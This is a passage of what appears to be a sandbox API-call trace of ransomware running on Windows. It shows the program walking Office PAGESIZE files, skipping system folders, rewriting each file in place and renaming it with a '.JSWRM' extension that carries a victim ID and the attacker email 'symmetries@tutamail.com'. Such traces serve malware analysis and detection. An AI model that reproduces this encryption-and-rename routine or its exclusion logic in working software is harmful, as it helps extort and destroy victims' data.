cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0138.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL102.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl102.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.812] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=59184) returned 1 [0138.812] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe730) returned 0x27b348 [0138.812] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xe730, lpOverlapped=0x0) returned 1 [0138.817] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.817] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xe730, lpOverlapped=0x0) returned 1 [0138.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0138.817] CloseHandle (hObject=0x238) returned 1 [0138.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0138.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0138.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0138.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0138.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0138.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0138.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0138.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0138.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0138.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0138.818] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL102.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl102.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL102.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl102.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0138.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0138.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0138.820] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d3659fb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d3659fb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5a1d84, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27aee, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL103.XML", cAlternateFileName="")) returned 1 [0138.820] lstrcmpiW (lpString1="PGLBL103.XML", lpString2=".") returned 1 [0138.820] lstrcmpiW (lpString1="PGLBL103.XML", lpString2="..") returned 1 [0138.820] lstrcmpiW (lpString1="PGLBL103.XML", lpString2="...") returned 1 [0138.820] lstrcmpiW (lpString1="PGLBL103.XML", lpString2="windows") returned -1 [0138.820] lstrcmpiW (lpString1="PGLBL103.XML", lpString2="recovery") returned -1 [0138.820] lstrcmpiW (lpString1="PGLBL103.XML", lpString2="perflogs") returned 1 [0138.821] lstrcmpiW (lpString1="PGLBL103.XML", lpString2="documents and settings") returned 1 [0138.821] lstrcmpiW (lpString1="PGLBL103.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.821] lstrcmpiW (lpString1="PGLBL103.XML", lpString2="system volume information") returned -1 [0138.821] lstrcmpiW (lpString1="PGLBL103.XML", lpString2="msocache") returned 1 [0138.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0138.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL103.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL103.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL103.XML", lpUsedDefaultChar=0x0) returned 12 [0138.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0138.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0138.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL103.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL103.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL103.XML", lpUsedDefaultChar=0x0) returned 12 [0138.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0138.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0138.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0138.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0138.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL103.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl103.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.822] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=162542) returned 1 [0138.822] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0138.822] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.833] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.833] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0138.834] CloseHandle (hObject=0x238) returned 1 [0138.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0138.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0138.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0138.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0138.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0138.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0138.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0138.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0138.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0138.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0138.834] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL103.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl103.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL103.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl103.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0138.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0138.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0138.836] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d3659fb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d3659fb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7b7e3f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x600b4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL104.XML", cAlternateFileName="")) returned 1 [0138.837] lstrcmpiW (lpString1="PGLBL104.XML", lpString2=".") returned 1 [0138.837] lstrcmpiW (lpString1="PGLBL104.XML", lpString2="..") returned 1 [0138.837] lstrcmpiW (lpString1="PGLBL104.XML", lpString2="...") returned 1 [0138.837] lstrcmpiW (lpString1="PGLBL104.XML", lpString2="windows") returned -1 [0138.837] lstrcmpiW (lpString1="PGLBL104.XML", lpString2="recovery") returned -1 [0138.837] lstrcmpiW (lpString1="PGLBL104.XML", lpString2="perflogs") returned 1 [0138.837] lstrcmpiW (lpString1="PGLBL104.XML", lpString2="documents and settings") returned 1 [0138.837] lstrcmpiW (lpString1="PGLBL104.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.837] lstrcmpiW (lpString1="PGLBL104.XML", lpString2="system volume information") returned -1 [0138.837] lstrcmpiW (lpString1="PGLBL104.XML", lpString2="msocache") returned 1 [0138.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0138.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL104.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL104.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL104.XML", lpUsedDefaultChar=0x0) returned 12 [0138.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0138.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0138.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL104.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL104.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL104.XML", lpUsedDefaultChar=0x0) returned 12 [0138.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0138.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0138.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0138.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0138.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL104.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl104.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.838] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=393396) returned 1 [0138.838] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0138.838] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.852] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.852] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0138.852] CloseHandle (hObject=0x238) returned 1 [0138.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0138.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0138.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0138.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0138.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0138.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0138.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0138.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0138.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0138.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0138.853] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL104.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl104.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL104.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl104.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0138.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0138.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0138.893] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d3659fb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d3659fb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5a1d84, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23124, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL105.XML", cAlternateFileName="")) returned 1 [0138.893] lstrcmpiW (lpString1="PGLBL105.XML", lpString2=".") returned 1 [0138.893] lstrcmpiW (lpString1="PGLBL105.XML", lpString2="..") returned 1 [0138.893] lstrcmpiW (lpString1="PGLBL105.XML", lpString2="...") returned 1 [0138.893] lstrcmpiW (lpString1="PGLBL105.XML", lpString2="windows") returned -1 [0138.893] lstrcmpiW (lpString1="PGLBL105.XML", lpString2="recovery") returned -1 [0138.893] lstrcmpiW (lpString1="PGLBL105.XML", lpString2="perflogs") returned 1 [0138.893] lstrcmpiW (lpString1="PGLBL105.XML", lpString2="documents and settings") returned 1 [0138.893] lstrcmpiW (lpString1="PGLBL105.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.893] lstrcmpiW (lpString1="PGLBL105.XML", lpString2="system volume information") returned -1 [0138.893] lstrcmpiW (lpString1="PGLBL105.XML", lpString2="msocache") returned 1 [0138.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0138.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL105.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL105.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL105.XML", lpUsedDefaultChar=0x0) returned 12 [0138.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0138.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0138.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL105.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL105.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL105.XML", lpUsedDefaultChar=0x0) returned 12 [0138.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0138.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0138.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0138.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0138.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL105.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl105.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.895] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=143652) returned 1 [0138.895] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x23120) returned 0x2501e8 [0138.895] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x23120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x23120, lpOverlapped=0x0) returned 1 [0138.906] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.906] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x23120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x23120, lpOverlapped=0x0) returned 1 [0138.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0138.906] CloseHandle (hObject=0x238) returned 1 [0138.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0138.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 